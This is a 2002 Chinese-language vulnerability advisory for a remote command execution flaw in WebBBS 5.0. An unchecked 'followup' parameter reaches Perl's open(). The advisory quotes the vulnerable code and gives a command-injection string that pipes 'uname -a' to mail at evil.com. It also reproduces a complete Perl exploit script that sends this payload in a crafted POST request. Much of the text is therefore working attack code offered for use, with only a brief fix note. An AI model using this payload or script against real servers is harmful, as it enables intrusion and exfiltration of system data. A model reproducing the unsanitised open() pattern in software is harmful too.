|
|
WebBBS remote command execution (APP,缺陷)
涉及程序:
WebBBS 5.0 (and later versions)
描述:
WebBBS 5.0允许攻击者通过web方式远程执行指令
详细:
WebBBS是应用较为广泛的,基于web方式的BBS公告版服务程序,以文本方式存储信息。
WebBBS的提交程序webbbs_post.pl允许通过攻击者特殊字符控制web服务器执行非法指令
,有缺陷的代码段如下:
Vulnerable:
WebBBS by Darryl Burgdorf
-----
webbbs_post.pl:
...
if ($FORM{'followup'}) { $followup =
"$FORM{'followup'}"; }
...
if ($followup) {
...
$subdir = "bbs".int($followup/1000);
open
(FOLLOWUP,"$dir/$subdir/$followup");
-----
从以上代码分析,如果我们在$followup变量输入时添加特殊字符,将可以执行指令:
"followup=10;uname -a|mail zlo@evil.com|"
解决方案:
请关注提供商提供的升级程序:
http://awsd.com/scripts/webbbs/
或者为webbbs_post.pl提供变量检查语句。
攻击方法:
Perl攻击脚本:
#!/usr/bin/perl
#
# nerF gr0up
#
# exploit code for
# WebBBS by Darryl C. Burgdorf
# all version up to 5.00 are vulnerable
#
#
# this is an exploitation of "followup" bug.
# it allows remote attacker to execute shell
commands.
# you can find WebBBS script at
http://awsd.com/scripts/webbbs/
#
# 06.06.2002
# btr // nerf
# nerf.ru
use IO::Socket;
srand();
$script = "/cgi-bin/webbbs/webbbs_config.pl";
$command = "uname -a|mail zlo@evil.com";
$host = "localhost";
$port = 80;
$content = "$content" . "name=" . rand(254);
$content = "$content" . "&email=" . rand(254);
$content = "$content" . "&subject=" .
rand(254);
$content = "$content" . "&body=" . rand(254);
$content="$content"."&followup=".rand(254)."|$command|";
$content_length = length($content);
$content_type =
"application/x-www-form-urlencoded";
if (@ARGV) {$command=@ARGV;}
if (@ARGV) {$host=@ARGV;}
if (@ARGV) {$script=@ARGV;}
$buf = "POST " . "$script" . "?post
HTTP/1.0\n";
$buf = "$buf" . "Content-Type:
$content_type\r\nContent-Length:";
$buf = "$buf" .
"$content_length\r\n\r\n$content", 0;
print "\tnerF gr0up\n";
print "exploit: WebBBS (awsd.com), version up
to 5.00\n";
print "sent:\n$buf\n";
if($socket = IO::Socket::INET->new("$host:$port")){
print $socket "$buf";
read($socket,$buf,1500);
print "recieved:\n$buf\n";
}
附加信息:
无
相关站点:
http://awsd.com/scripts/webbbs/
发布时间:2002年6月20日
|
|